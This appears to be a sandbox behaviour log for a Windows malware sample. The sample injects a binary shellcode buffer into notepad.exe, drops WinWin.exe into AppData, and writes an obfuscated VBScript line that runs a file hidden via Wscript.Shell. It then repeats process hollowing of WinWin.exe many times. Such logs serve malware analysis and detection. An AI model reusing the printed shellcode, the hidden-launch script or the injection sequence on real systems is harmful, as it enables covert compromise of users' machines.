| Time & API |
Arguments |
Status |
Return |
Repeated |
1619610626.14125
CreateProcessInternalW
|
thread_identifier:
1432
thread_handle:
0x0000012c
process_identifier:
2288
current_directory:
filepath:
C:\Windows\System32\notepad.exe
track:
1
command_line:
filepath_r:
C:\Windows\system32\notepad.exe
stack_pivoted:
0
creation_flags:
32
(NORMAL_PRIORITY_CLASS)
process_handle:
0x00000124
inherit_handles:
0
|
success
|
1 |
0
|
1619610626.14125
NtAllocateVirtualMemory
|
process_identifier:
2288
region_size:
4096
stack_dep_bypass:
0
stack_pivoted:
0
heap_dep_bypass:
0
protection:
64
(PAGE_EXECUTE_READWRITE)
process_handle:
0x00000124
allocation_type:
12288
(MEM_COMMIT|MEM_RESERVE)
base_address:
0x000f0000
|
success
|
0 |
0
|
1619610626.14125
NtAllocateVirtualMemory
|
process_identifier:
2288
region_size:
4096
stack_dep_bypass:
0
stack_pivoted:
0
heap_dep_bypass:
0
protection:
4
(PAGE_READWRITE)
process_handle:
0x00000124
allocation_type:
12288
(MEM_COMMIT|MEM_RESERVE)
base_address:
0x00140000
|
success
|
0 |
0
|
1619610626.14125
WriteProcessMemory
|
process_identifier:
2288
buffer:
Q¹0���d�@�@���@��$�$YÃVWR¾§ÆgNè���Yø�v��·
¿Zw��f;Ït
¿Nt��f;Ïu�Â�è�
Àt�ÎÁá�þÁï��Ï�¾:�Ï3ñBHué_Æ^ÃUìQQM�SVW
Ét;¸MZ��f9�u1A<�Át*8PE��u"@xeü��Áx�X$p @��ù�Ù�ñEø
Àu
3À_^[ÉÃM�Eü��ÑèOÿÿÿ;E�t
ÿEüEü;Eøràë×Eü�·�C��E�ëÊUìQSW3ÿWWj�Wj�h���@ÿu�ÿV�Øûÿu�3Àë&WWWS}üÿV0W}�EüPWÿu�SÿV�SÿV�3À9}ü�À_[ÉÃ
Ét�è���
Àt�3Éf�ÃUìì����Vð
äüÿÿP3ÀPPj�PÿVl
À�
���j\XfEü3Àj.fEþXjvfEðXfEòjbXfEôjsXfEö3ÀfEøUü
äüÿÿèÖ���U�èÎ���UðèÆ���ÿu�
ìþÿÿÿu�PÿVxÄ�
äüÿÿPÿV�
ìþÿÿPèÂ���@P
ìþÿÿP
äüÿÿPèîþÿÿÄ�^ÉÃUìì,���j:XjZfEÜXjofEÞXjnfEàXjefEâXjIfEäXjdfEæXjefEèXjnfEêXjtfEìXjifEîXjffEðXjifEòXfEôjeXfEöjrXfEø3ÀfEú
Ôýÿÿè¬���UÜè÷���EÿPÆEÿ�è����PEÿP
ÔýÿÿPè?þÿÿÄ�ÉÃUìQeü�VðEüPÿu�èþ���YY
Àt�}ü�t�ÿuüPÿu�è�þÿÿÄ�
Àt�3À@ë�3À^ÉÃUìì����SVðÏ
øýÿÿè'���Èè(þÿÿ3ÛS
øýÿÿPÿV�WÿV�8]�u�Wÿu�Æè~ÿÿÿYYØë }��u5SWÿu�ÿ�WÿV(3ÛøÿÏ�Ãèªþÿÿû�u�9]�u�WÿV(È�PWÿV,3À@ë�3À^[ÉÃUìì�SVWèsüÿÿø
ÿ�"���h"�¿WèÌüÿÿØYY
Û�����j�h�0��h���j�ÿÓð
ö�ñ���h¼Û«½W~`^@èüÿÿh�Ò¼WF$èüÿÿh|QgjWF(èyüÿÿhë�IWF,èküÿÿhå©WF0è]üÿÿh¥°�(WF4èOüÿÿh�)�·WF8èAüÿÿh[uðWFDè3üÿÿÄ@ØhdóuW^ è üÿÿh¢¦aëWF�è�üÿÿhÕOd"WF�è�üÿÿhy.ÃWF�èöûÿÿh±��÷WF�èèûÿÿheóW÷WF�èÚûÿÿh¯4PWF�èÌûÿÿh{=#WF<è¾ûÿÿÄ@hOû~
WF�èûÿÿhà=!6WFHèûÿÿh�h#W�èûÿÿFLhÍ��eWèûÿÿhÓ1ÆVWFPèvûÿÿh7�½WFTèhûÿÿh£-ã�WFXèZûÿÿF\Ä8EðPÇEðshelÇEôl32�ÿÓø
ÿt"hÀåz°W~dè,ûÿÿhêêºWFlè�ûÿÿÄ�FpEøPÇEøuserfÇEü32ÆEþ�ÿV ø
ÿtAhqV°0W~hèìúÿÿhkV°0WFxèÞúÿÿh&cjWFtèÐúÿÿh<cjWF|èÂúÿÿÄ ���Æë�3À_^[ÉÃUìì\Vu�W3ÿ;÷�î���Sè¤ýÿÿØ;ßu�Wÿ�D���éÕ�������EüPë�j2ÿSPÿuüWWÿSL
ÀuïjdÿSPF�EøE�9>tYÿ¶�����¶����QP¾����Ãè¾üÿÿ}�3ÿÄ�9>t1jDE¤WPè����j�EèWPèü���Ä�EèPE¤PWWj WWWWÿu�ÿS$9¾(���t�l���P,���Pÿu�Ãè½úÿÿÄ�9¾����t�ë�j2ÿSPÿuüWWÿSL
ÀuïjdÿSPÿuøÿS�WÿSD[_3À^ÉÂ��Uìì�SW3ÿWWj�Wj�h���ÿu�}øÿV�Øûÿu�3Àë>WSÿV�Eô;Çt+j�h�0��PWÿV@Eø;Çt�WMüQÿuô}üPSÿV�EüM��SÿV�Eø_[ÉÃ�·�f�f
Òt�Vð+ñÁ��·�f��f
Òuñ^ÃUìQQE�EüEü�E�EøEü;Eøt�EüM��Eü@EüëçE�ÉÃf8�Vðt Æ�f>�u÷+ò�·
f���f
Éuñ^ÃD$��@Éuù+D$�HÃ
Éu�3ÀÃf9�Át À�f8�u÷+ÁÑøÃ
Ét èÚÿÿÿ
Àt�DAþë fù\t
è��·�f
Éuï3ÀÃ
process_handle:
0x00000124
base_address:
0x000f0000
|
success
|
1 |
0
|
1619610626.14125
WriteProcessMemory
|
process_identifier:
2288
buffer:
����C�:�\�U�s�e�r�s�\�A�d�m�i�n�i�s�t�r�a�t�o�r�.�O�s�k�a�r�-�P�C�\�A�p�p�D�a�t�a�\�L�o�c�a�l�\�T�e�m�p�\�6�9�f�e�b�f�2�d�3�9�0�7�f�7�e�0�a�5�0�0�2�f�5�6�2�2�e�3�c�9�b�e�.�e�x�e�����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������C�:�\�U�s�e�r�s�\�A�d�m�i�n�i�s�t�r�a�t�o�r�.�O�s�k�a�r�-�P�C�\�A�p�p�D�a�t�a�\�R�o�a�m�i�n�g�\�A�p�p�D�a�t�a�\�W�i�n�W�i�n�.�e�x�e���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������"�C�:�\�U�s�e�r�s�\�A�d�m�i�n�i�s�t�r�a�t�o�r�.�O�s�k�a�r�-�P�C�\�A�p�p�D�a�t�a�\�L�o�c�a�l�\�T�e�m�p�\�6�9�f�e�b�f�2�d�3�9�0�7�f�7�e�0�a�5�0�0�2�f�5�6�2�2�e�3�c�9�b�e�.�e�x�e�"� �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������C�r�e�6�5�������������������������������������������������������sET dlWcDlamjSjbJffxZ = crEAtEOBJect("Wscript.SheLL")
DLwCDlAMjsjbjFfxZ.run """%ls""", 0, False��������������������������������������������������������������������������������������������������������
process_handle:
0x00000124
base_address:
0x00140000
|
success
|
1 |
0
|
1619630833.112125
CreateProcessInternalW
|
thread_identifier:
708
thread_handle:
0x000000d0
process_identifier:
1948
current_directory:
filepath:
C:\Users\Administrator.Oskar-PC\AppData\Roaming\AppData\WinWin.exe
track:
1
command_line:
filepath_r:
C:\Users\Administrator.Oskar-PC\AppData\Roaming\AppData\WinWin.exe
stack_pivoted:
0
creation_flags:
32
(NORMAL_PRIORITY_CLASS)
process_handle:
0x000000cc
inherit_handles:
0
|
success
|
1 |
0
|
1619630839.00325
CreateProcessInternalW
|
thread_identifier:
784
thread_handle:
0x0000012c
process_identifier:
376
current_directory:
filepath:
track:
1
command_line:
"C:\Users\Administrator.Oskar-PC\AppData\Roaming\AppData\WinWin.exe"
filepath_r:
stack_pivoted:
0
creation_flags:
4
(CREATE_SUSPENDED)
process_handle:
0x00000124
inherit_handles:
0
|
success
|
1 |
0
|
1619630839.00325
NtUnmapViewOfSection
|
process_identifier:
376
region_size:
4096
process_handle:
0x00000124
base_address:
0x00400000
|
success
|
0 |
0
|
1619630839.00325
NtMapViewOfSection
|
section_handle:
0x00000134
process_identifier:
376
commit_size:
692224
win32_protect:
64
(PAGE_EXECUTE_READWRITE)
buffer:
process_handle:
0x00000124
allocation_type:
0
()
section_offset:
0
view_size:
692224
base_address:
0x00400000
|
success
|
0 |
0
|
1619630839.01925
NtGetContextThread
|
thread_handle:
0x0000012c
|
success
|
0 |
0
|
1619630839.01925
NtSetContextThread
|
thread_handle:
0x0000012c
registers.eip:
0
registers.esp:
0
registers.edi:
0
registers.eax:
4526783
registers.ebp:
0
registers.edx:
0
registers.ebx:
2130567168
registers.esi:
0
registers.ecx:
0
process_identifier:
376
|
success
|
0 |
0
|
1619630844.12825
NtResumeThread
|
thread_handle:
0x0000012c
suspend_count:
1
process_identifier:
376
|
success
|
0 |
0
|
1619630844.12825
CreateProcessInternalW
|
thread_identifier:
3040
thread_handle:
0x00000130
process_identifier:
2340
current_directory:
filepath:
track:
1
command_line:
"C:\Users\Administrator.Oskar-PC\AppData\Roaming\AppData\WinWin.exe" 2 376 34910859
filepath_r:
stack_pivoted:
0
creation_flags:
32
(NORMAL_PRIORITY_CLASS)
process_handle:
0x00000140
inherit_handles:
0
|
success
|
1 |
0
|
1619630856.5495
CreateProcessInternalW
|
thread_identifier:
3180
thread_handle:
0x000002e0
process_identifier:
3176
current_directory:
filepath:
C:\Users\Administrator.Oskar-PC\AppData\Roaming\AppData\WinWin.exe
track:
1
command_line:
filepath_r:
C:\Users\Administrator.Oskar-PC\AppData\Roaming\AppData\WinWin.exe
stack_pivoted:
0
creation_flags:
32
(NORMAL_PRIORITY_CLASS)
process_handle:
0x000002e4
inherit_handles:
0
|
success
|
1 |
0
|
1619630859.78375
CreateProcessInternalW
|
thread_identifier:
3252
thread_handle:
0x0000012c
process_identifier:
3248
current_directory:
filepath:
track:
1
command_line:
"C:\Users\Administrator.Oskar-PC\AppData\Roaming\AppData\WinWin.exe"
filepath_r:
stack_pivoted:
0
creation_flags:
4
(CREATE_SUSPENDED)
process_handle:
0x00000124
inherit_handles:
0
|
success
|
1 |
0
|
1619630859.78375
NtUnmapViewOfSection
|
process_identifier:
3248
region_size:
4096
process_handle:
0x00000124
base_address:
0x00400000
|
success
|
0 |
0
|
1619630859.78375
NtMapViewOfSection
|
section_handle:
0x00000134
process_identifier:
3248
commit_size:
692224
win32_protect:
64
(PAGE_EXECUTE_READWRITE)
buffer:
process_handle:
0x00000124
allocation_type:
0
()
section_offset:
0
view_size:
692224
base_address:
0x00400000
|
success
|
0 |
0
|
1619630859.79975
NtGetContextThread
|
thread_handle:
0x0000012c
|
success
|
0 |
0
|
1619630859.79975
NtSetContextThread
|
thread_handle:
0x0000012c
registers.eip:
0
registers.esp:
0
registers.edi:
0
registers.eax:
4526783
registers.ebp:
0
registers.edx:
0
registers.ebx:
2130567168
registers.esi:
0
registers.ecx:
0
process_identifier:
3248
|
success
|
0 |
0
|
1619630859.83075
NtResumeThread
|
thread_handle:
0x0000012c
suspend_count:
1
process_identifier:
3248
|
success
|
0 |
0
|
1619630859.83075
CreateProcessInternalW
|
thread_identifier:
3312
thread_handle:
0x00000130
process_identifier:
3308
current_directory:
filepath:
track:
1
command_line:
"C:\Users\Administrator.Oskar-PC\AppData\Roaming\AppData\WinWin.exe" 2 3248 34926562
filepath_r:
stack_pivoted:
0
creation_flags:
32
(NORMAL_PRIORITY_CLASS)
process_handle:
0x00000140
inherit_handles:
0
|
success
|
1 |
0
|
1619630860.361373
CreateProcessInternalW
|
thread_identifier:
3420
thread_handle:
0x0000012c
process_identifier:
3416
current_directory:
filepath:
C:\Users\Administrator.Oskar-PC\AppData\Roaming\AppData\WinWin.exe
track:
1
command_line:
filepath_r:
C:\Users\Administrator.Oskar-PC\AppData\Roaming\AppData\WinWin.exe
stack_pivoted:
0
creation_flags:
32
(NORMAL_PRIORITY_CLASS)
process_handle:
0x00000130
inherit_handles:
0
|
success
|
1 |
0
|
1619630863.564625
CreateProcessInternalW
|
thread_identifier:
3500
thread_handle:
0x0000012c
process_identifier:
3496
current_directory:
filepath:
track:
1
command_line:
"C:\Users\Administrator.Oskar-PC\AppData\Roaming\AppData\WinWin.exe"
filepath_r:
stack_pivoted:
0
creation_flags:
4
(CREATE_SUSPENDED)
process_handle:
0x00000124
inherit_handles:
0
|
success
|
1 |
0
|
1619630863.564625
NtUnmapViewOfSection
|
process_identifier:
3496
region_size:
4096
process_handle:
0x00000124
base_address:
0x00400000
|
success
|
0 |
0
|
1619630863.564625
NtMapViewOfSection
|
section_handle:
0x00000134
process_identifier:
3496
commit_size:
692224
win32_protect:
64
(PAGE_EXECUTE_READWRITE)
buffer:
process_handle:
0x00000124
allocation_type:
0
()
section_offset:
0
view_size:
692224
base_address:
0x00400000
|
success
|
0 |
0
|
1619630863.580625
NtGetContextThread
|
thread_handle:
0x0000012c
|
success
|
0 |
0
|
1619630863.580625
NtSetContextThread
|
thread_handle:
0x0000012c
registers.eip:
0
registers.esp:
0
registers.edi:
0
registers.eax:
4526783
registers.ebp:
0
registers.edx:
0
registers.ebx:
2130567168
registers.esi:
0
registers.ecx:
0
process_identifier:
3496
|
success
|
0 |
0
|
1619630863.643625
NtResumeThread
|
thread_handle:
0x0000012c
suspend_count:
1
process_identifier:
3496
|
success
|
0 |
0
|
1619630863.643625
CreateProcessInternalW
|
thread_identifier:
3560
thread_handle:
0x00000130
process_identifier:
3556
current_directory:
filepath:
track:
1
command_line:
"C:\Users\Administrator.Oskar-PC\AppData\Roaming\AppData\WinWin.exe" 2 3496 34930375
filepath_r:
stack_pivoted:
0
creation_flags:
32
(NORMAL_PRIORITY_CLASS)
process_handle:
0x00000140
inherit_handles:
0
|
success
|
1 |
0
|
1619630864.1115
CreateProcessInternalW
|
thread_identifier:
3668
thread_handle:
0x0000012c
process_identifier:
3664
current_directory:
filepath:
C:\Users\Administrator.Oskar-PC\AppData\Roaming\AppData\WinWin.exe
track:
1
command_line:
filepath_r:
C:\Users\Administrator.Oskar-PC\AppData\Roaming\AppData\WinWin.exe
stack_pivoted:
0
creation_flags:
32
(NORMAL_PRIORITY_CLASS)
process_handle:
0x00000130
inherit_handles:
0
|
success
|
1 |
0
|
1619630867.30025
CreateProcessInternalW
|
thread_identifier:
3748
thread_handle:
0x0000012c
process_identifier:
3744
current_directory:
filepath:
track:
1
command_line:
"C:\Users\Administrator.Oskar-PC\AppData\Roaming\AppData\WinWin.exe"
filepath_r:
stack_pivoted:
0
creation_flags:
4
(CREATE_SUSPENDED)
process_handle:
0x00000124
inherit_handles:
0
|
success
|
1 |
0
|
1619630867.30025
NtUnmapViewOfSection
|
process_identifier:
3744
region_size:
4096
process_handle:
0x00000124
base_address:
0x00400000
|
success
|
0 |
0
|
1619630867.30025
NtMapViewOfSection
|
section_handle:
0x00000134
process_identifier:
3744
commit_size:
692224
win32_protect:
64
(PAGE_EXECUTE_READWRITE)
buffer:
process_handle:
0x00000124
allocation_type:
0
()
section_offset:
0
view_size:
692224
base_address:
0x00400000
|
success
|
0 |
0
|
1619630867.31525
NtGetContextThread
|
thread_handle:
0x0000012c
|
success
|
0 |
0
|
1619630867.31525
NtSetContextThread
|
thread_handle:
0x0000012c
registers.eip:
0
registers.esp:
0
registers.edi:
0
registers.eax:
4526783
registers.ebp:
0
registers.edx:
0
registers.ebx:
2130567168
registers.esi:
0
registers.ecx:
0
process_identifier:
3744
|
success
|
0 |
0
|
1619630867.33125
NtResumeThread
|
thread_handle:
0x0000012c
suspend_count:
1
process_identifier:
3744
|
success
|
0 |
0
|
1619630867.34725
CreateProcessInternalW
|
thread_identifier:
3808
thread_handle:
0x00000130
process_identifier:
3804
current_directory:
filepath:
track:
1
command_line:
"C:\Users\Administrator.Oskar-PC\AppData\Roaming\AppData\WinWin.exe" 2 3744 34934062
filepath_r:
stack_pivoted:
0
creation_flags:
32
(NORMAL_PRIORITY_CLASS)
process_handle:
0x00000140
inherit_handles:
0
|
success
|
1 |
0
|
1619630868.206
CreateProcessInternalW
|
thread_identifier:
3912
thread_handle:
0x0000013c
process_identifier:
3908
current_directory:
filepath:
C:\Users\Administrator.Oskar-PC\AppData\Roaming\AppData\WinWin.exe
track:
1
command_line:
filepath_r:
C:\Users\Administrator.Oskar-PC\AppData\Roaming\AppData\WinWin.exe
stack_pivoted:
0
creation_flags:
32
(NORMAL_PRIORITY_CLASS)
process_handle:
0x00000140
inherit_handles:
0
|
success
|
1 |
0
|
1619630871.425
CreateProcessInternalW
|
thread_identifier:
3988
thread_handle:
0x0000012c
process_identifier:
3984
current_directory:
filepath:
track:
1
command_line:
"C:\Users\Administrator.Oskar-PC\AppData\Roaming\AppData\WinWin.exe"
filepath_r:
stack_pivoted:
0
creation_flags:
4
(CREATE_SUSPENDED)
process_handle:
0x00000124
inherit_handles:
0
|
success
|
1 |
0
|
1619630871.425
NtUnmapViewOfSection
|
process_identifier:
3984
region_size:
4096
process_handle:
0x00000124
base_address:
0x00400000
|
success
|
0 |
0
|
1619630871.425
NtMapViewOfSection
|
section_handle:
0x00000134
process_identifier:
3984
commit_size:
692224
win32_protect:
64
(PAGE_EXECUTE_READWRITE)
buffer:
process_handle:
0x00000124
allocation_type:
0
()
section_offset:
0
view_size:
692224
base_address:
0x00400000
|
success
|
0 |
0
|
1619630871.44
NtGetContextThread
|
thread_handle:
0x0000012c
|
success
|
0 |
0
|
1619630871.44
NtSetContextThread
|
thread_handle:
0x0000012c
registers.eip:
0
registers.esp:
0
registers.edi:
0
registers.eax:
4526783
registers.ebp:
0
registers.edx:
0
registers.ebx:
2130567168
registers.esi:
0
registers.ecx:
0
process_identifier:
3984
|
success
|
0 |
0
|
1619630871.456
NtResumeThread
|
thread_handle:
0x0000012c
suspend_count:
1
process_identifier:
3984
|
success
|
0 |
0
|
1619630871.472
CreateProcessInternalW
|
thread_identifier:
4048
thread_handle:
0x00000130
process_identifier:
4044
current_directory:
filepath:
track:
1
command_line:
"C:\Users\Administrator.Oskar-PC\AppData\Roaming\AppData\WinWin.exe" 2 3984 34938187
filepath_r:
stack_pivoted:
0
creation_flags:
32
(NORMAL_PRIORITY_CLASS)
process_handle:
0x00000140
inherit_handles:
0
|
success
|
1 |
0
|
1619630872.205625
CreateProcessInternalW
|
thread_identifier:
2248
thread_handle:
0x00000138
process_identifier:
708
current_directory:
filepath:
C:\Users\Administrator.Oskar-PC\AppData\Roaming\AppData\WinWin.exe
track:
1
command_line:
filepath_r:
C:\Users\Administrator.Oskar-PC\AppData\Roaming\AppData\WinWin.exe
stack_pivoted:
0
creation_flags:
32
(NORMAL_PRIORITY_CLASS)
process_handle:
0x0000013c
inherit_handles:
0
|
success
|
1 |
0
|
1619630875.44
CreateProcessInternalW
|
thread_identifier:
2560
thread_handle:
0x00000130
process_identifier:
1432
current_directory:
filepath:
track:
1
command_line:
"C:\Users\Administrator.Oskar-PC\AppData\Roaming\AppData\WinWin.exe"
filepath_r:
stack_pivoted:
0
creation_flags:
4
(CREATE_SUSPENDED)
process_handle:
0x00000128
inherit_handles:
0
|
success
|
1 |
0
|
1619630875.44
NtUnmapViewOfSection
|
process_identifier:
1432
region_size:
4096
process_handle:
0x00000128
base_address:
0x00400000
|
success
|
0 |
0
|
1619630875.44
NtMapViewOfSection
|
section_handle:
0x00000138
process_identifier:
1432
commit_size:
692224
win32_protect:
64
(PAGE_EXECUTE_READWRITE)
buffer:
process_handle:
0x00000128
allocation_type:
0
()
section_offset:
0
view_size:
692224
base_address:
0x00400000
|
success
|
0 |
0
|
1619630875.456
NtGetContextThread
|
thread_handle:
0x00000130
|
success
|
0 |
0
|